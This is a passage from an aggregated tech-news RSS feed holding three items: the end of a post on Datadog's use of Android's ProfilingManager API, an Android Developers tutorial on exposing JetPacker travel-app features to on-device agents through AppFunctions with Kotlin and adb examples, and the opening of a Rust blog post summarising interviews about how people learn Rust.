  ProfilingManager supports a wide range of collection methods, including CPU traces, call stack sampling, memory analysis through Java heap dumps and native heap profiles. It enables developers to profile production builds, upload trace files to external storage, and review them in the Perfetto trace analyzer UI. As a SaaS provider, Datadog uploads, visualizes, and analyzes these profiles collected via its SDK, providing a unified view of application health. 
</p>

By centralizing high-fidelity telemetry within a unified observability API, ProfilingManager empowers Datadog and its clients to proactively monitor, investigate, and remediate complex Android performance regressions through key technical advantages:

<ul>
  <li>
    <strong>Granular session diagnostics:</strong> ProfilingManager enhances debuggability by delivering direct OS-level trace data, overcoming the visibility and alignment challenges typical of custom logging with system services. To dive deeper, developers can download these traces from Datadog to investigate further in visualization tools like the <a href="https://ui.perfetto.dev/">Perfetto UI</a>. 
  </li>
  <li>
    <strong>Automated telemetry triggers:</strong> By leveraging native system events to initiate trace recordings at key optimization points, Datadog reduces the need to build custom collection logic. While the initial rollout focuses on the <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*xix6h8*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_APP_FULLY_DRAWN">APP_FULLY_DRAWN </a>signal, there are already plans to expand this observability to include <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*1hl4p7n*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_ANR">ANR</a>, <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*8x3pd*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_OOM">OOM</a>, and <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*1ezx2ma*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_COLD_START">COLD_START</a> triggers.</li>
  <li>
    <strong>Proactive trace snapshots:</strong> By interfacing directly with the system-level Perfetto service (traced), ProfilingManager utilizes a proactive background recording model designed to capture unpredictable issues. This ensures that developers receive a precise visualization of the events leading up to a performance anomaly, offering a level of insight that exceeds what is possible through manual instrumentation. 
  </li>
  <li>
    <strong>Bottleneck detection at scale:</strong> Datadog is able to synthesize telemetry from across Datadog’s global customer base to uncover regressions that only emerge under unique hardware configurations and variable network environments.
  </li>
  <li>
    <strong>System-enforced resource stability:</strong> The API leverages sampling trace collection to ensure performance and user experience impacts remain unnoticeable.
  </li>
  <li>
    <strong>On-device data controls:</strong> ProfilingManager filters out irrelevant information from other processes on-device before the profile is delivered to the app. This minimizes file sizes and ensures that only data relevant to the app's processes is provided.</li>
</ul>

<h3>Processing millions of weekly profiles to optimize real-world apps</h3><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2ikpIrv_Km0RiIq-khGPFHpfA5CRYHfnLj2oRxLSuTk2x8qJFoO4UyNiwMpJphecSAVR4aWcJEB7BzvkXYjkyDggRDUYhLTBGhoj5q3b6BmwA5IcsER1_k5tffie6pteW3YNkIwI5Y6rG_Ie35Xzzq-mEnfq8iinA_cd_r5ydCxfRwajPSngrY1591k/s3464/datadog-profiling-blogpost-final.png"><img border="0" data-original-height="1686" data-original-width="3464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2ikpIrv_Km0RiIq-khGPFHpfA5CRYHfnLj2oRxLSuTk2x8qJFoO4UyNiwMpJphecSAVR4aWcJEB7BzvkXYjkyDggRDUYhLTBGhoj5q3b6BmwA5IcsER1_k5tffie6pteW3YNkIwI5Y6rG_Ie35Xzzq-mEnfq8iinA_cd_r5ydCxfRwajPSngrY1591k/s16000/datadog-profiling-blogpost-final.png"></a></div><i><div><i>An example of Datadog's time to initial display measurement with </i></div><div><i>stack sampling powered by ProfilingManager</i></div></i><br>Integrating a system-level profiling API into a global monitoring SDK required solving infrastructure challenges. Because ProfilingManager generates highly detailed performance traces, the Datadog engineering team had to build a pipeline capable of parsing and analyzing these profiles on the server side at scale. <span><span>Beyond profile collection, Datadog also emphasizes the importance of balancing sampling frequency with collecting enough data to generate meaningful insights about your application. </span></span>Datadog relies on ProfilingManager’s built-in rate limiting as a critical stability safeguard, preventing excessive telemetry requests from overburdening user devices.<br><br>The team has been profiling Datadog's own native Android application and a number of early adopters’ applications for months, gathering millions of profiles to ensure a fast, error-free launch experience and to refine their performance-detection algorithms. Today, the production integration seamlessly scales across a variety of Android devices. <p></p><h3>Conclusion</h3><p>By integrating Android’s ProfilingManager API, Datadog successfully closed the visibility gap between backend systems and mobile client applications for their customers. By processing millions of profiles weekly with negligible device overhead, Datadog equips Android developers with the code-level insights necessary to diagnose complex performance bugs instantly, helping developers build smoother applications and improve their app’s performance signals in the Play Store. To adopt the ProfilingManager API directly into your performance observability framework, check out our <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/overview">documentation</a>.</p>

<p>
  In the future, Datadog aims to make Android profiling data a first-class input for coding agents to autonomously resolve performance bottlenecks, closing the feedback loop between detection and remediation. Datadog is working toward making Android profiling broadly accessible to developers.
</p>

<p>
  To get started using the Datadog real user monitoring feature powered by ProfilingManager, visit <a href="https://www.datadoghq.com/dg/real-user-monitoring/android-profiling/?utm_source=inbound&amp;utm_medium=corpsite-display&amp;utm_campaign=int-rum-ww-blog-announcement-announcement-androidprofilerblog2026">Datadog Mobile Real User Monitoring</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: Integrate into Android's intelligence system using AppFunctions]]></title>
<description><![CDATA[Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our previous post, we explored...]]></description>
<link>https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:27 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s2469/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png"><p></p><p><i>Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer Relations</i></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s8583/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s1600/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"></a></div><br><p><br></p><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our <a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">previous post</a>, we explored how to leverage Firebase AI Logic to build cloud-hosted and hybrid AI features.</p>Traditional mobile UIs excel at focused, hands-on tasks, and the Android intelligence system is introducing complementary features to make complex, multi-step actions even easier. By supplementing traditional user interfaces, AppFunctions provide a powerful new entry point: A privileged agent on the device can access app features in the background. This can be particularly helpful when users are driving, walking or otherwise multitasking. 

<p>In this article, we'll show you how we designed and integrated these capabilities into our travel planning app, <a href="https://github.com/android/ai-samples/tree/main/jetpacker">JetPacker</a>, using Android AppFunctions. We'll explore the rationale behind our feature choices, discuss the specialized tooling we used to accelerate development, and dive into the code that makes it all work.</p>

<h2>Designing AI-ready features: making choices that matter for your users</h2>

<p>To select which features to provide to the intelligence system, we looked for tasks where a voice or text command is objectively faster than tapping through screens. In this side-by-side screen recording you can see this contrast perfectly: on the left, a user tapping through multiple screens to log an expense; on the right, the same task completed instantly in the background via a privileged agent.</p>

<div class="vertical-video-grid">
  <div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s960/Comp%201.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s1600/Comp%201.gif"></a></div><br><div class="vertical-video-wrapper"><br></div>

<p>Our first choice was expense tracking. Logging a coffee expense during a trip usually takes quite a few taps—unlocking the phone, opening the app, finding the active trip, navigating to the expenses tab, tapping the add button, taking a picture of the receipt, and checking the result. By providing the <code>addExpense</code> and <code>getExpenses</code> features as AppFunctions, the system agent handles the heavy lifting. When the user says, "Add a five-dollar coffee expense to my Paris trip," the agent automatically searches for the correct trip ID in the background and inserts the expense, skipping the manual UI flow entirely.</p>

<p>We also prioritized itinerary management. Finding what activity is next on a busy trip itinerary usually requires scrolling through a dense timeline view. By providing <code>getItinerary</code> and <code>addItineraryEvent</code> to the system, the user can simply ask, "What am I doing next in Paris?" and get an immediate answer.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s960/Comp%202.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s1600/Comp%202.gif"></a></div><br><p><br></p>
  

<p>Finally, we focused on hands-free note capturing. Typing out reminders or notes while walking down a busy street is difficult and unsafe. Exposing a voice note capability allows the user to say, "The flight was amazing, I saw a beautiful sunset and managed to sleep well," and the privileged agent automatically transcribes and saves it directly into the travel database <span face="Roboto, sans-serif"> using the </span><span>addVoiceNote</span><span face="Roboto, sans-serif"> AppFunction.</span></p>

<h2>Android MCP powered by AppFunctions</h2>This entire experience is built on Android MCP. Under this design, the app acts as a local MCP server. Rather than remote APIs, you provide your app features directly to the on-device intelligence system.<br><br><a href="https://d.android.com/ai/appfunctions">Android AppFunctions</a> is the API that brings this concept to life. It reads annotated Kotlin functions and compiles them into type-safe, sandboxed tool definitions that the privileged agent can discover and invoke locally on the device.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s2500/Android%20MCP%20diagram.png"><img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s1600/Android%20MCP%20diagram.png"></a></div><br><p><br></p>

<p><br></p><p><br></p><p><br></p><p><br></p><p><br></p><i><div><i>Diagram highlighting our apps, the android platform, and system agents coordinate AppFunctions.</i></div></i><p>Under the Android MCP model, your app acts as a local MCP server that exposes structured tools, while the Android platform serves as the central tool registry. On the MCP client side, agent apps are registered with the intelligence system after being granted system-privileged permissions to access the registry.</p>

<p>When a user interacts with a registered agent, its LLM determines if the request can be handled by an AppFunction, queries the platform's metadata, and executes the appropriate registered functions in the background. This local MCP client-server design gives you full control: you choose exactly which features are accessible to the agent, keeping the rest of your app's data private.</p>

<h2>How we accelerated development with Android skills</h2>

To streamline the integration process, we leveraged the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a>. The AppFunctions development skill is a complete development companion. It guided us through the entire lifecycle: mapping Kotlin data classes to serialize parameters, generating the necessary <code>Service</code> entry points, refining our <code>KDoc</code> documentation to ensure the LLM understands parameter boundaries, and setting up automated testing using ADB.

<h2>Providing app features to the intelligence system</h2>

<p>Enough with the theory, let's dive into the implementation.</p>

<h4>Configuration and dependency setup</h4>

<p>We begin by adding the AppFunctions dependencies. One for the API and one for the Kotlin Symbol Processing compiler.</p>

<pre><code>implementation("androidx.appfunctions:appfunctions:1.0.0-alpha10")
ksp("androidx.appfunctions:appfunctions-compiler:1.0.0-alpha10")</code></pre>

<h4>Modeling custom data types</h4>

<p>Any custom object exchanged with the agent must be annotated with <code>@AppFunctionSerializable</code>. In our <a href="https://github.com/android/ai-samples/tree/main/jetpacker/android/feature/appfunctions/src/main/java/com/example/jetpacker/feature/appfunctions/TripSerializable.kt">TripSerializable.kt</a> file, we define our trip data model:</p>

<pre><code>@AppFunctionSerializable(isDescribedByKDoc = true)
data class TripSerializable(
    /** The trip's unique identifier. */
    val id: String,
    /** The trip's title. */
    val title: String,
    /** The trip's destination location. */
    val location: String,
    /** The trip's start date in milliseconds. */
    val startDate: Long,
    /** The trip's end date in milliseconds. */
    val endDate: Long,
    /** A list of participants. */
    val participants: List&lt;String&gt;,
)</code></pre>

<h4>Providing features using the @AppFunction annotation</h4>

<p>Next, the skill wrote the Kotlin functions that perform the database queries and annotate them with <code>@AppFunction</code>. We can view this in searchTrip:</p>

<pre><code>/**
 * Looks for trips based on optional filters like id, title (name), location, and dates.
 *
 * @param id The unique identifier of the trip.
 * @param title The title or name of the trip.
 * @param location The destination location.
 * @param startDate The minimum start date in milliseconds.
 * @param endDate The maximum end date in milliseconds.
 * @return A list of trips matching the filters.
 */
@AppFunction(isDescribedByKDoc = true)
suspend fun searchTrip(
    id: String? = null,
    title: String? = null,
    location: String? = null,
    startDate: Long? = null,
    endDate: Long? = null
): List&lt;TripSerializable&gt; {
    return withContext(Dispatchers.IO) {
    // implementation
}</code></pre>

<p>Since AppFunctions run on the UI thread by default, we use <code>withContext(Dispatchers.IO)</code> to switch to a background dispatcher. Additionally, we refine our KDoc to use clear, imperative verbs and specify parameter constraints. This documentation compiles directly into the tool's schema, which the privileged agent uses to resolve parameters and handle runtime errors.</p>

<h4>The service entry point and Hilt integration</h4>

<p>To register these features with the intelligence system, we create an abstract base class that extends <code>AppFunctionService</code>. We annotate it with <code>@AppFunctionServiceEntryPoint</code>:</p>

<pre><code>@RequiresApi(36)
@AndroidEntryPoint
@AppFunctionServiceEntryPoint(
    serviceName = "JetPackerAppFunctionService",
    appFunctionXmlFileName = "jetpacker_app_function_service"
)
abstract class BaseJetPackerAppFunctionService : AppFunctionService() {
    @Inject internal lateinit var tripDao: TripDao
    // DAOs and database references are injected here...
}</code></pre>

<p>During compilation, KSP generates the final concrete service subclass, <code>JetPackerAppFunctionService</code>, as declared with the <code>serviceName</code> parameter. We also register <code>app_metadata.xml</code> in the app's manifest. This file provides global operational rules for JetPacker's declared AppFunctions.</p>

<h2>Testing and verifying your AppFunctions</h2>

<p>Once implemented, you should verify that your AppFunctions are registered and working correctly.</p>

<p>Running devices or emulators with Android 17 or newer, you can use ADB commands from your terminal to list and invoke your functions. Running <code>adb shell cmd app_function list-app-functions</code> displays all registered functions for your package. You can then execute a specific function and test its database integration by running <code>adb shell cmd app_function execute-app-function</code> while passing a raw JSON parameters string.</p>

<p>Instead of these ADB commands, you can also use the <a href="https://github.com/android/appfunctions">AppFunctions Testing Agent</a> to inspect your configuration, list and execute AppFunctions, and even see how your AppFunctions behave in a real conversational flow.</p>

<h2>Wrapping it up</h2>

<p>When thinking about app features that can be contributed to the intelligence system using AppFunctions requires a slight shift in how we think about code and documentation. AppFunctions enable you to use this new interaction model for apps, which allows using an agent to access app features..</p>

<p>First, the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a> is an essential lifecycle tool, helping you discover features, implement and refine AppFunctions for your apps. Second, KDoc comments are a compiled API asset; clear parameter descriptions directly impact the execution accuracy of the system agent. Finally, Android MCP provides local-first execution allowing apps to safely collaborate with AI agents.</p>

<p>Contributing app features through AppFunctions makes your application ready for the intelligence system. Let us know how you are adapting your apps for the agentic era!</p>

<h2>Learn more</h2>

<p>Check out the other parts of this blog post series:<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html">Part 1:</a></b> Introduction of the app and a high-level overview.<br><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"><b>Part 2:</b></a> On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">Part 3:</a></b> Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"><b>Part 4 (this post!):</b></a> System integration. Integrating with the Android intelligence system using AppFunctions. <br>Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.</p>

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>
  All code snippets in this blog post follow the following copyright notice:
</p>
<pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: The many journeys of learning Rust]]></title>
<description><![CDATA[This is another post in our series covering what we learned through the Vision Doc process. We previously described the overall approach and what we learned about doing user research, we explored what people love about Rust, dug into what it takes to ship safety-crticial Rust, and described some ...]]></description>
<link>https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>This is another post in our series covering what we learned through the Vision Doc process. We previously <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">described the overall approach and what we learned about doing user research</a>, we <a href="https://blog.rust-lang.org/2025/12/19/what-do-people-love-about-rust/" rel="external">explored what people love about Rust</a>, <a href="https://blog.rust-lang.org/2026/01/14/what-does-it-take-to-ship-rust-in-safety-critical/" rel="external">dug into what it takes to ship safety-crticial Rust</a>, and <a href="https://blog.rust-lang.org/2026/03/20/rust-challenges/" rel="external">described some of the major challenges that people face when using Rust</a>.</em></p>
<p>In this post we walk through what folks have found on their journey to learn the Rust programming language with ups and downs covered.</p>
<p>As a disclaimer, LLMs (Large Language Models) come up in this post because our interviewees brought them up. We're scoping discussion to their use as a learning tool, covering research and example generation, not broader questions about AI (Artificial Intelligence) in software development.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#many-paths-to-needing-rust"></a>
Many paths to needing Rust</h3>
<p>The interviews surfaced several different paths into Rust: curiosity, embedded work, job-market pressure, organizational adoption, and reassignment after a team or company chose Rust. That last path matters because many learners are not evaluating Rust from a blank slate; they are trying to become productive after Rust has already arrived in their work.</p>
<blockquote>
<p>"Funny enough, I've advocated for more niche languages than Rust in the past. Rust has pretty much stopped being as much of a niche language as it was, but it's not Java." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#rust-learning-resources"></a>
Rust learning resources</h3>
<p>Likely as expected, the folks that we talked to reach for a range of resources to learn Rust. Some reach for official documentation, such as <a href="https://doc.rust-lang.org/book/" rel="external">The Rust Programming Language Book</a> and find that sufficient to build on what the compiler was already showing them.</p>
<blockquote>
<p>"I started with the official Rust documentation because there are a lot of great examples of how features like the borrow checker work." -- Software engineer at an Automotive supplier</p>
</blockquote>
<p>Others needed more passes and more formats, sometimes reaching for resources the community maintains, such as <a href="https://rustlings.rust-lang.org/" rel="external">Rustlings</a>, <a href="https://danielkeep.github.io/tlborm/book/index.html" rel="external">The Little Book of Rust Macros</a>, and <a href="https://rust-unofficial.github.io/too-many-lists/" rel="external">Learn Rust With Entirely Too Many Linked Lists</a>.</p>
<blockquote>
<p>"The first time I went through the chapter in [The Rust Programming Language] on borrow checking, I was like, what is this? I read it again, then I watched a YouTube video of someone explaining the chapter." -- Rust freelance consultant</p>
</blockquote>
<blockquote>
<p>"Rust book, Rustlings, Zero to Production in Rust, Jon Gjengset tutorials. A bunch of books. It's not a one-pass reading. Can't say how many times I've gone through it." -- Software engineer working on video streaming and storage</p>
</blockquote>
<p>These resources have brought up an entire generation of Rust programmers. But, to some, there is a perception that these resources have trouble keeping pace with the language.</p>
<blockquote>
<p>"We'd like to use [The Rust Programming Language/'the book'], but we've found that it's out of date, unfortunately. We've looked at the GitHub repo and found it's got a lot of unresolved issues and unmerged PRs" -- Principal Software Engineering work on Rust adoption in a regulated industry</p>
</blockquote>
<p>Whether or not this is factually true, Rust's growth has nonetheless put more scrutiny on these materials. Companies evaluating adoption and engineers getting reassigned to Rust teams are looking at them with fresh eyes and finding the gaps that affect their own evaluation.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#beginner-stumblings-and-unlearning-habits"></a>
Beginner stumblings and unlearning habits</h3>
<p>It's pretty typical for Rust to be the 2nd, 3rd or Nth programming language that someone picks up. They'd end up writing their most familiar language in Rust, whether C++ patterns, Java patterns, or whatever they knew, for months or even years. Eventually they got comfortable enough to start writing idiomatic Rust.</p>
<blockquote>
<p>"There's a bit of a drop in productivity compared to C if you're already familiar with it just because you're learning new rules, new syntax."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"In the beginning it was more poking around the code and adding and removing some ampersands and asterisks to try to make sense of <code>mut</code> and not <code>mut</code> and whatever." -- Senior engineer with 20 years of Java experience in cloud and IoT</p>
</blockquote>
<p>We also spoke with someone who found that not having much of a programming background seemed to benefit people picking up Rust. Not having worn-in grooves from other languages may play a role here, and it's worth investigating further.</p>
<blockquote>
<p>"I had someone who had never programmed much before start working on the internals of [our Rust project]. She was just fine with getting into Rust. It's more of the senior people that struggle as they need to unlearn practices which may work in other languages, but it's not the 'Rust' way." -- Researcher, Automotive OEM R&amp;D Lab</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-to-work-with-the-borrow-checker"></a>
Learning to work with the borrow checker</h3>
<p>We heard a lot about learning to work with the borrow checker instead of against it. People get there through different paths, but a few patterns came up repeatedly.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#the-compiler-as-teacher"></a>
The compiler as teacher</h4>
<p>Rust's diagnostics did the teaching on their own, especially around lifetimes.</p>
<blockquote>
<p>"If you mess up the lifetimes in a piece of code that you've written by hand, I usually find that Rust's diagnostics are very helpful" -- Researcher working on static analysis of Rust programs</p>
</blockquote>
<blockquote>
<p>"Whatever's missing, the compiler usually fills in: it tells me 'you need to declare the lifetime of this reference', so I know and can figure it out. That all generally works pretty well." -- Senior Software Engineer</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-by-doing"></a>
Learning by doing</h4>
<p>Others felt like they only really internalized the borrow checker after writing a lot of Rust. It took projects, coding challenges, prototyping and so on until at some point it clicked.</p>
<blockquote>
<p>"I actually did not understand the borrow checker until I spent a lot of time writing Rust" -- Founder of a startup built on Rust</p>
</blockquote>
<blockquote>
<p>"Besides the prototyping work, I also did coding-challenge-type stuff to get familiar with Rust for Advent of Code. [..] It eventually clicked to the point where I wasn't fighting with Rust, it was working for me. I had that experience other people describe: when I managed to get my program to fit with Rust, it worked. I didn't spend time debugging." -- Principal Software Engineer, large SaaS provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#letting-go-of-clone-guilt"></a>
Letting go of "clone guilt"</h4>
<p>Some learners arrive with the assumption that good Rust means zero clones, zero copies, lifetimes threaded through everything. They set the bar at optimal before they've learned how to write idiomatic Rust, and it makes the borrow checker feel harder than it needs to be at the outset.</p>
<blockquote>
<p>"On one of my first projects, I was like, 'I don't ever want to copy or clone anything,' so I carefully wove through all the lifetimes and got myself into a bit of a bind. Then I saw someone else just cloning the struct I was working with, and it was super cheap. Sometimes you can just clone and it's going to be okay." -- Researcher at a university</p>
</blockquote>
<p>The experienced Rust developers we spoke with consistently said the same thing: clone freely while you're learning, then optimize when you understand the problem. Rust's reputation for performance and correctness feeds this. Newcomers assume anything less than optimal is wrong before they've written a first working program, and clone guilt is how that shows up.</p>
<p>We think it could be an interesting area of future study to check into the patterns Rust programmers employ at different levels of experience and under which circumstances. One member of the Rust Vision doc team that's very experienced with Rust noted that there's kind of an "expected shape" they understand as passing the compiler. This knowledge influences how they approach writing code which wouldn't take that shape and they naturally find themselves understanding when to use so-called workarounds, such as passing around indices into arrays or <code>Vec</code>s.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#multi-paradigm-but-not-the-oop-some-are-used-to"></a>
Multi-paradigm, but not the OOP some are used to</h3>
<p>The Rust programming language is multi-paradigm, and how that lands depends on what you're coming from. We heard some that came from a functional background were delighted with digging into learning how much Rust inherits from that lineage. Some others noted that they and others on their teams struggled to unlearn the object-oriented style they'd come to use heavily in other languages like C++ and Java.</p>
<blockquote>
<p>"Developers coming from C++ tend to think object-oriented. I think that's a difference between C++ and Rust." -- Architect at Automotive OEM</p>
</blockquote>
<blockquote>
<p>"I had exactly that thing, where I would apply all my years of Java and JS thinking, where I could just create some object, not care about it, return it, have it sloshing around between various functions. Found myself reaching for these patterns and then being told 'no, you cannot do that'." -- Principal Engineer at a SaaS company</p>
</blockquote>
<p>Developers coming from functional programming had less to unlearn: strong typing, pattern matching, and an expression-oriented style were already familiar.</p>
<blockquote>
<p>"My background has been more functional programming, strong typing. That originated for me as a Lisper: once a Lisper, always a Lisper." -- Principal Software Engineer working on Rust tooling for safety-regulated industries</p>
</blockquote>
<blockquote>
<p>"The languages I primarily used before Rust were things like OCaml. Way back, I came from C and C++, the classic languages, and then I spent quite a long time doing primarily pure functional stuff. These days I've ended up back in what I like to think of as a pragmatic center ground [with Rust]." -- Fractional CTO</p>
</blockquote>
